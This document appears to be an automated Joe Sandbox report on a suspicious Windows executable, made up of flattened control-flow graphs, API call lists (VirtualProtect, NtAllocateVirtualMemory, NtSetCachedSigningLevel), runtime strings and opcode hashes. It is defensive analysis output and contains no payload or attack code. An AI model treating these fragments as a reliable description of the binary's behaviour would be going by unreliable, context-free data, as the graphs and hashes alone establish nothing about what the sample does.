3749->3750 3643 7ff64fe0219e 3644 7ff64fe02272 3643->3644 3645 7ff64fe021ab EnterCriticalSection 3643->3645 3646 7ff64fe02265 LeaveCriticalSection 3645->3646 3648 7ff64fe021c8 3645->3648 3646->3644 3647 7ff64fe021e9 TlsGetValue GetLastError 3647->3648 3648->3646 3648->3647 2415 7ff64fe01394 2419 7ff64fe07850 2415->2419 2417 7ff64fe013b8 2418 7ff64fe013c6 NtAllocateVirtualMemory 2417->2418 2420 7ff64fe0786e 2419->2420 2423 7ff64fe0789b 2419->2423 2420->2417 2421 7ff64fe07943 2422 7ff64fe0795f malloc 2421->2422 2424 7ff64fe07980 2422->2424 2423->2420 2423->2421 2424->2420 3649 7ff64fe01ab3 3650 7ff64fe01a70 3649->3650 3650->3649 3651 7ff64fe0199e 3650->3651 3652 7ff64fe01b36 3650->3652 3657 7ff64fe01b5c 3650->3657 3653 7ff64fe01a0f 3651->3653 3656 7ff64fe019e9 VirtualProtect 3651->3656 3654 7ff64fe01ba0 4 API calls 3652->3654 3655 7ff64fe01b53 3654->3655 3656->3651 3751 7ff64fe01e10 3752 7ff64fe01e2f 3751->3752 3753 7ff64fe01ecc 3752->3753 3756 7ff64fe01e55 3752->3756 3757 7ff64fe01eb5 3752->3757 3754 7ff64fe01ed3 signal 3753->3754 3753->3757 3755 7ff64fe01ee4 3754->3755 3754->3757 3755->3757 3758 7ff64fe01eea signal 3755->3758 3756->3757 3759 7ff64fe01f12 signal 3756->3759 3758->3757 3759->3757 3774 7ff64fe01a70 3775 7ff64fe0199e 3774->3775 3777 7ff64fe01a7d 3774->3777 3776 7ff64fe01a0f 3775->3776 3778 7ff64fe019e9 VirtualProtect 3775->3778 3777->3774 3779 7ff64fe01b5c 3777->3779 3780 7ff64fe01b36 3777->3780 3778->3775 3781 7ff64fe01ba0 4 API calls 3780->3781 3782 7ff64fe01b53 3781->3782 3804 7ff64fe01fd0 3805 7ff64fe01fe4 3804->3805 3806 7ff64fe02033 3804->3806 3805->3806 3807 7ff64fe01ffd EnterCriticalSection LeaveCriticalSection 3805->3807 3807->3806 3808 7ff64fe02050 3809 7ff64fe020cf 3808->3809 3810 7ff64fe0205e EnterCriticalSection 3808->3810 3811 7ff64fe020c2 LeaveCriticalSection 3810->3811 3812 7ff64fe02079 3810->3812 3811->3809 3812->3811 3813 7ff64fe020bd free 3812->3813 3813->3811 3783 7ff64fe0216f 3784 7ff64fe02185 3783->3784 3785 7ff64fe02178 InitializeCriticalSection 3783->3785 3785->3784 3814 7ff64fe01f47 3815 7ff64fe01e99 3814->3815 3816 7ff64fe01e67 signal 3814->3816 3816->3815 3817 7ff64fe01e7c 3816->3817 3817->3815 3818 7ff64fe01e82 signal 3817->3818 3818->3815

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 2643109117-0
                                                                        • Opcode ID: aeeb52fd5712a361e2da6e26dffb6e8464a4deb846e01eb2e9d82df5293092f4
                                                                        • Instruction ID: 00389e6b432856e922ad5e8d946a207c7ec33c1243e6b84949fd355d96b9b8ac
                                                                        • Opcode Fuzzy Hash: aeeb52fd5712a361e2da6e26dffb6e8464a4deb846e01eb2e9d82df5293092f4
                                                                        • Instruction Fuzzy Hash: 56515D31A0D663A9F710BF15E9403B923A5BFC6782F485032DA4DDB3A6DEBDE4458300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64FE01156), ref: 00007FF64FE013F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e4240df5c98d2c5786ee7734f75f297ed30777c359ba7612eed9737ec24f9522
                                                                        • Instruction ID: 882a0afb092e22b4aaaddaff061bf7111981266842e9f325edd18cc6dd5faa3e
                                                                        • Opcode Fuzzy Hash: e4240df5c98d2c5786ee7734f75f297ed30777c359ba7612eed9737ec24f9522
                                                                        • Instruction Fuzzy Hash: 61F0FF7190CB5A9AE610FF91F85056A77A2FBCAB81F004539EA8C83725CF7CE050DB45
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$wcscat$wcscpy$_wcsnicmp$_wcsicmpmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1039688341-3916222277
                                                                        • Opcode ID: 9337f3ebd6c8c82438709f36923177ea92fb6172f18788ac32c7f9ff0f72a760
                                                                        • Instruction ID: 8da6293b3f9bef95ef6cd456ac776374577544442c78c63cb996562fe0394bcf
                                                                        • Opcode Fuzzy Hash: 9337f3ebd6c8c82438709f36923177ea92fb6172f18788ac32c7f9ff0f72a760
                                                                        • Instruction Fuzzy Hash: 95437421C1CBD3A8F711AB29E8413F46764BFD6385F4C5235D88CE66A5EFACA249C305

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscatwcscpywcslen
                                                                        • String ID: $0$0$@$@
                                                                        • API String ID: 4263182637-1413854666
                                                                        • Opcode ID: f7b098571e4ed3b7eec5741f980412e30988114217fb30f33e78ca92afe78e4c
                                                                        • Instruction ID: 82eae07569e594653df2ceb7e4efad72c058521c3ee03ac455a654c900d40ecc
                                                                        • Opcode Fuzzy Hash: f7b098571e4ed3b7eec5741f980412e30988114217fb30f33e78ca92afe78e4c
                                                                        • Instruction Fuzzy Hash: C6B16D2190CAD2A9F321AB14E4053FA77A4FFC5345F084235EA8D97BA9DFBDD1498B40

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                        • String ID: 0$X$`
                                                                        • API String ID: 329590056-2527496196
                                                                        • Opcode ID: b9bb3efecb3ff639fed478dd9ffba46010662aa7922eff09eb78b373566c2b69
                                                                        • Instruction ID: 06a1dba34b60156ae2a1c0368ee4ca1c7d367a1fb18b541b21ec3b1baaf62aba
                                                                        • Opcode Fuzzy Hash: b9bb3efecb3ff639fed478dd9ffba46010662aa7922eff09eb78b373566c2b69
                                                                        • Instruction Fuzzy Hash: 5B029D2290CB9295E720AF19E8443AA77A4FF867A4F084235DADC977E5EF7CD149C700

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF64FE09418,00007FF64FE09418,?,?,00007FF64FE00000,?,00007FF64FE01991), ref: 00007FF64FE01C63
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF64FE09418,00007FF64FE09418,?,?,00007FF64FE00000,?,00007FF64FE01991), ref: 00007FF64FE01CC7
                                                                        • memcpy.MSVCRT ref: 00007FF64FE01CE0
                                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF64FE09418,00007FF64FE09418,?,?,00007FF64FE00000,?,00007FF64FE01991), ref: 00007FF64FE01D23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                        • API String ID: 2595394609-2123141913
                                                                        • Opcode ID: 80ef160fb769c8a310db049c65ca43167cbfea638bfcc1d561bc1c1716d0c638
                                                                        • Instruction ID: 0081ea50f6207c7f48965655795c415bc3494e61b7dbd9280fef9ebb72f3a3eb
                                                                        • Opcode Fuzzy Hash: 80ef160fb769c8a310db049c65ca43167cbfea638bfcc1d561bc1c1716d0c638
                                                                        • Instruction Fuzzy Hash: AD419C61A0CA63B9EA14BF41D8846B827A0FFC6BC6F594032CA0DCB395DEBDE545C301

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                        • String ID:
                                                                        • API String ID: 3326252324-0
                                                                        • Opcode ID: 3a29a66536c40fc68ff0253b6a4c3b0ab77415f4f1f5f474e552cc69f7c7c273
                                                                        • Instruction ID: b33a9719a2ea70ee9342a606fba6103514ae2513a820d2fd76a2f045442efe21
                                                                        • Opcode Fuzzy Hash: 3a29a66536c40fc68ff0253b6a4c3b0ab77415f4f1f5f474e552cc69f7c7c273
                                                                        • Instruction Fuzzy Hash: 9C21BE21E0DA23A5FA55BB51E9443B823A4FFD6BD6F485031CA0DD77A5DFACE8468300

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 603 7ff64fe01e10-7ff64fe01e2d 604 7ff64fe01e2f-7ff64fe01e38 603->604 605 7ff64fe01e3e-7ff64fe01e48 603->605 604->605 606 7ff64fe01f60-7ff64fe01f69 604->606 607 7ff64fe01ea3-7ff64fe01ea8 605->607 608 7ff64fe01e4a-7ff64fe01e53 605->608 607->606 609 7ff64fe01eae-7ff64fe01eb3 607->609 610 7ff64fe01e55-7ff64fe01e60 608->610 611 7ff64fe01ecc-7ff64fe01ed1 608->611 612 7ff64fe01eb5-7ff64fe01eba 609->612 613 7ff64fe01efb-7ff64fe01f0a call 7ff64fe07df0 609->613 610->607 614 7ff64fe01f23-7ff64fe01f2d 611->614 615 7ff64fe01ed3-7ff64fe01ee2 signal 611->615 612->606 616 7ff64fe01ec0 612->616 613->614 625 7ff64fe01f0c-7ff64fe01f10 613->625 619 7ff64fe01f43-7ff64fe01f45 614->619 620 7ff64fe01f2f-7ff64fe01f3f 614->620 615->614 617 7ff64fe01ee4-7ff64fe01ee8 615->617 616->614 621 7ff64fe01f4e-7ff64fe01f53 617->621 622 7ff64fe01eea-7ff64fe01ef9 signal 617->622 619->606 620->619 624 7ff64fe01f5a 621->624 622->606 624->606 626 7ff64fe01f55 625->626 627 7ff64fe01f12-7ff64fe01f21 signal 625->627 626->624 627->606
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CCG
                                                                        • API String ID: 0-1584390748
                                                                        • Opcode ID: c8c41ab9f220862b7d35ce4fa0b9d5211a85f395b094bb85a6da21781a4b1460
                                                                        • Instruction ID: 670720c81ff02bd55b7e32f034b7556d44fc1d6b7ad3bb8e52927d3284d5de72
                                                                        • Opcode Fuzzy Hash: c8c41ab9f220862b7d35ce4fa0b9d5211a85f395b094bb85a6da21781a4b1460
                                                                        • Instruction Fuzzy Hash: 3A21C721F0C1276AFB747A1495403791381BFC77A6F298131DE1DCB3D5CEAEE8828241

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 628 7ff64fe01880-7ff64fe0189c 629 7ff64fe018a2-7ff64fe018f9 call 7ff64fe02420 call 7ff64fe02660 628->629 630 7ff64fe01a0f-7ff64fe01a1f 628->630 629->630 635 7ff64fe018ff-7ff64fe01910 629->635 636 7ff64fe01912-7ff64fe0191c 635->636 637 7ff64fe0193e-7ff64fe01941 635->637 638 7ff64fe0191e-7ff64fe01929 636->638 639 7ff64fe0194d-7ff64fe01954 636->639 637->639 640 7ff64fe01943-7ff64fe01947 637->640 638->639 641 7ff64fe0192b-7ff64fe0193a 638->641 643 7ff64fe0199e-7ff64fe019a6 639->643 644 7ff64fe01956-7ff64fe01961 639->644 640->639 642 7ff64fe01a20-7ff64fe01a26 640->642 641->637 646 7ff64fe01a2c-7ff64fe01a37 642->646 647 7ff64fe01b87-7ff64fe01b98 call 7ff64fe01d40 642->647 643->630 645 7ff64fe019a8-7ff64fe019c1 643->645 648 7ff64fe01970-7ff64fe0199c call 7ff64fe01ba0 644->648 650 7ff64fe019df-7ff64fe019e7 645->650 646->643 651 7ff64fe01a3d-7ff64fe01a5f 646->651 648->643 655 7ff64fe019d0-7ff64fe019dd 650->655 656 7ff64fe019e9-7ff64fe01a0d VirtualProtect 650->656 657 7ff64fe01a7d-7ff64fe01a97 651->657 655->630 655->650 656->655 658 7ff64fe01b74-7ff64fe01b82 call 7ff64fe01d40 657->658 659 7ff64fe01a9d-7ff64fe01afa 657->659 658->647 664 7ff64fe01b22-7ff64fe01b26 659->664 665 7ff64fe01afc-7ff64fe01b0e 659->665 668 7ff64fe01a70-7ff64fe01a77 664->668 669 7ff64fe01b2c-7ff64fe01b30 664->669 666 7ff64fe01b10-7ff64fe01b20 665->666 667 7ff64fe01b5c-7ff64fe01b6f call 7ff64fe01d40 665->667 666->664 666->667 667->658 668->643 668->657 669->668 671 7ff64fe01b36-7ff64fe01b53 call 7ff64fe01ba0 669->671 674 7ff64fe01b57 671->674 674->674
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64FE01247), ref: 00007FF64FE019F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                        • API String ID: 544645111-395989641
                                                                        • Opcode ID: cf4a0938d5745cf3f0d050ff4f8884fc30c6aa4c67ca2699eb88dc176e313b6a
                                                                        • Instruction ID: 1de6466454bae98b8f2d333fa04ccbdb09ba242fa882ac1222144ae1fbcd46a3
                                                                        • Opcode Fuzzy Hash: cf4a0938d5745cf3f0d050ff4f8884fc30c6aa4c67ca2699eb88dc176e313b6a
                                                                        • Instruction Fuzzy Hash: FF518021E0C566EAEB10BF25D8407B42761FF96B9AF484131DA1C877A4CFBDE586C700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 675 7ff64fe01800-7ff64fe01810 676 7ff64fe01824 675->676 677 7ff64fe01812-7ff64fe01822 675->677 678 7ff64fe0182b-7ff64fe01867 call 7ff64fe02290 fprintf 676->678 677->678
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: fprintf
                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                        • API String ID: 383729395-3474627141
                                                                        • Opcode ID: 49f4af4bda1f1a1e2ab7baa5fcfb1583464bebbd0c41258c396d4a3718496155
                                                                        • Instruction ID: 434632b86cea15e041a448199e82e3eeda05c814ee19a47a83eef2d3996ce9ef
                                                                        • Opcode Fuzzy Hash: 49f4af4bda1f1a1e2ab7baa5fcfb1583464bebbd0c41258c396d4a3718496155
                                                                        • Instruction Fuzzy Hash: B9F09611E1CA65A6E611BB64A9410BD6360FFDB7C2F509232DE4DD7655DF6CF282C300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1725458051.00007FF64FE01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64FE00000, based on PE: true
                                                                        • Associated: 00000000.00000002.1725443976.00007FF64FE00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725473676.00007FF64FE08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725489387.00007FF64FE0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725503457.00007FF64FE0B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725779276.00007FF650081000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1725792897.00007FF650083000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff64fe00000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                        • String ID:
                                                                        • API String ID: 682475483-0
                                                                        • Opcode ID: 8aa54c0fbd7215a94801c4dad15e2e96f0e494586a06395055d78c8bab4265d9
                                                                        • Instruction ID: ce9507c66754b0708315c9eed03a6f0de8182aa1afad7644ed5f35fa5b0e9d2b
                                                                        • Opcode Fuzzy Hash: 8aa54c0fbd7215a94801c4dad15e2e96f0e494586a06395055d78c8bab4265d9
                                                                        • Instruction Fuzzy Hash: 1001DE26A0DA23A5EA55BF51AD042B813A4FF85BD2F485031CB0DD3799DFACE955C200

                                                                        Execution Graph

                                                                        Execution Coverage:3.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1698
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 4355 7ff6d96d1ab3 4356 7ff6d96d1a70 4355->4356 4356->4355 4357 7ff6d96d199e 4356->4357 4358 7ff6d96d1b36 4356->4358 4362 7ff6d96d1b53 4356->4362 4359 7ff6d96d1a0f 4357->4359 4361 7ff6d96d19e9 VirtualProtect 4357->4361 4360 7ff6d96d1ba0 4 API calls 4358->4360 4360->4362 4361->4357 2783 7ff6d96d1394 2787 7ff6d96d7850 2783->2787 2785 7ff6d96d13b8 2786 7ff6d96d13c6 NtSetCachedSigningLevel 2785->2786 2788 7ff6d96d786e 2787->2788 2791 7ff6d96d789b 2787->2791 2788->2785 2789 7ff6d96d7943 2790 7ff6d96d795f malloc 2789->2790 2792 7ff6d96d7980 2790->2792 2791->2788 2791->2789 2792->2788 4501 7ff6d96d216f 4502 7ff6d96d2185 4501->4502 4503 7ff6d96d2178 InitializeCriticalSection 4501->4503 4503->4502 4371 7ff6d96d1e10 4372 7ff6d96d1e2f 4371->4372 4373 7ff6d96d1eb5 4372->4373 4374 7ff6d96d1ecc 4372->4374 4377 7ff6d96d1e55 4372->4377 4374->4373 4375 7ff6d96d1ed3 signal 4374->4375 4375->4373 4376 7ff6d96d1ee4 4375->4376 4376->4373 4378 7ff6d96d1eea signal 4376->4378 4377->4373 4379 7ff6d96d1f12 signal 4377->4379 4378->4373 4379->4373 4504 7ff6d96d1a70 4506 7ff6d96d199e 4504->4506 4508 7ff6d96d1a7d 4504->4508 4505 7ff6d96d1a0f 4506->4505 4507 7ff6d96d19e9 VirtualProtect 4506->4507 4507->4506 4508->4504 4509 7ff6d96d1b36 4508->4509 4511 7ff6d96d1b53 4508->4511 4510 7ff6d96d1ba0 4 API calls 4509->4510 4510->4511 4533 7ff6d96d2050 4534 7ff6d96d205e EnterCriticalSection 4533->4534 4535 7ff6d96d20cf 4533->4535 4536 7ff6d96d20c2 LeaveCriticalSection 4534->4536 4537 7ff6d96d2079 4534->4537 4536->4535 4537->4536 4538 7ff6d96d20bd free 4537->4538 4538->4536 4539 7ff6d96d1fd0 4540 7ff6d96d1fe4 4539->4540 4541 7ff6d96d2033 4539->4541 4540->4541 4542 7ff6d96d1ffd EnterCriticalSection LeaveCriticalSection 4540->4542 4542->4541 4543 7ff6d96d1f47 4544 7ff6d96d1e67 signal 4543->4544 4547 7ff6d96d1e99 4543->4547 4545 7ff6d96d1e7c 4544->4545 4544->4547 4546 7ff6d96d1e82 signal 4545->4546 4545->4547 4546->4547 4548 7ff6d96d1ac3 4551 7ff6d96d1a70 4548->4551 4549 7ff6d96d199e 4552 7ff6d96d1a0f 4549->4552 4555 7ff6d96d19e9 VirtualProtect 4549->4555 4550 7ff6d96d1b36 4553 7ff6d96d1ba0 4 API calls 4550->4553 4551->4549 4551->4550 4554 7ff6d96d1b53 4551->4554 4553->4554 4555->4549 4380 7ff6d96d1404 4381 7ff6d96d1394 2 API calls 4380->4381 4382 7ff6d96d1413 4381->4382 4383 7ff6d96d1422 4382->4383 4384 7ff6d96d1394 2 API calls 4382->4384 4385 7ff6d96d1394 2 API calls 4383->4385 4384->4383 4386 7ff6d96d142c 4385->4386 4387 7ff6d96d1431 4386->4387 4388 7ff6d96d1394 2 API calls 4386->4388 4389 7ff6d96d1394 2 API calls 